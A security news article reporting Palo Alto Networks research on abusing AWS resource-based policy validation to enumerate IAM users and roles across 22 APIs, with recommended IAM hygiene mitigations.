Palo Alto Networks security researchers identified more than 20 Amazon Web Services (AWS) APIs that can be abused to obtain information such as Identity and Access Management (IAM) users and roles.
The same attack could be leveraged to abuse 22 APIs across 16 different AWS services to obtain the roster of an account, get a glimpse into an organization’s internal structure, and leverage the information to launch targeted attacks against specific individuals.
According to the security researchers who identified the vulnerable APIs, the attack works across all three AWS partitions (aws, aws-us-gov or aws-cn). AWS services susceptible to abuse include Amazon Simple Storage Service (S3), Amazon Key Management Service (KMS), and Amazon Simple Queue Service (SQS).
“The root cause of the issue is that the AWS backend proactively validates all the resource-based policies attached to resources such as Amazon Simple Storage Service (S3) buckets and customer-managed keys,” Palo Alto Networks explains.
A Principal field is typically included in resource-based policies, to specify the users or roles with access to the resource. However, if a nonexistent identity is included in the policy, the API call to create or update the policy fails, and an attacker can abuse this feature to check existing identities in an AWS account.
By repeatedly invoking the vulnerable APIs with different principals, an adversary can enumerate the targeted account’s users and roles. What’s more, the enumeration is not visible from the targeted account, because the API logs and error messages are available only for the “attacker’s account where the resource policies are manipulated,” the researchers note.
Detection and prevention of such an attack are rather difficult, with the adversary not being time restricted when it comes to performing reconnaissance on random or targeted AWS accounts.
IAM security best practices for organizations looking to mitigate the issue, Palo Alto Networks says, include reducing attack surface by removing inactive users and roles, making usernames and role names difficult to guess by adding random strings to them, log and monitor identity authentication activities, use two-factor authentication (2FA), and log in with identity provider and federation.
“Good IAM security hygiene can still effectively mitigate the threats from this type of attack. Although it’s not possible to prevent an attacker from enumerating identities in AWS accounts, the enumeration can be made more difficult and you can monitor for suspicious activities taken after the reconnaissance,” the researchers note.
Related: AWS Network Firewall Now Generally Available
Related: AWS Fraud Detection Service Becomes Generally Available
Related: AWS Security Service ‘Amazon Detective’ Now Generally Available
More from Ionut Arghire
- OpenAI Patches Account Takeover Vulnerabilities in ChatGPT
- New Wi-Fi Attack Allows Traffic Interception, Security Bypass
- Casino Giant Crown Resorts Investigating Ransomware Group’s Data Theft Claims
- Over 200 Organizations Targeted in Chinese Cyberespionage Campaign
- Nigerian BEC Scammer Sentenced to Prison in US
- China’s Nuclear Energy Sector Targeted in Cyberespionage Campaign
- 14 Million Records Stolen in Data Breach at Latitude Financial Services
- iOS Security Update Patches Exploited Vulnerability in Older iPhones
Latest News
- UK Introduces Mass Surveillance With Online Safety Bill
- Musk, Scientists Call for Halt to AI Race Sparked by ChatGPT
- Malware Hunters Spot Supply Chain Attack Hitting 3CX Desktop App
- LeapXpert Banks $22M Funding to Secure Corporate Messaging With Consumer Apps
- Blockchain Security Firm True I/O Raises $9 Million
- Spera Banks $10 Million to Tackle Identity and Access Sprawl
- OpenAI Patches Account Takeover Vulnerabilities in ChatGPT
- OpenSSL 1.1.1 Nears End of Life: Security Updates Only Until September 2023
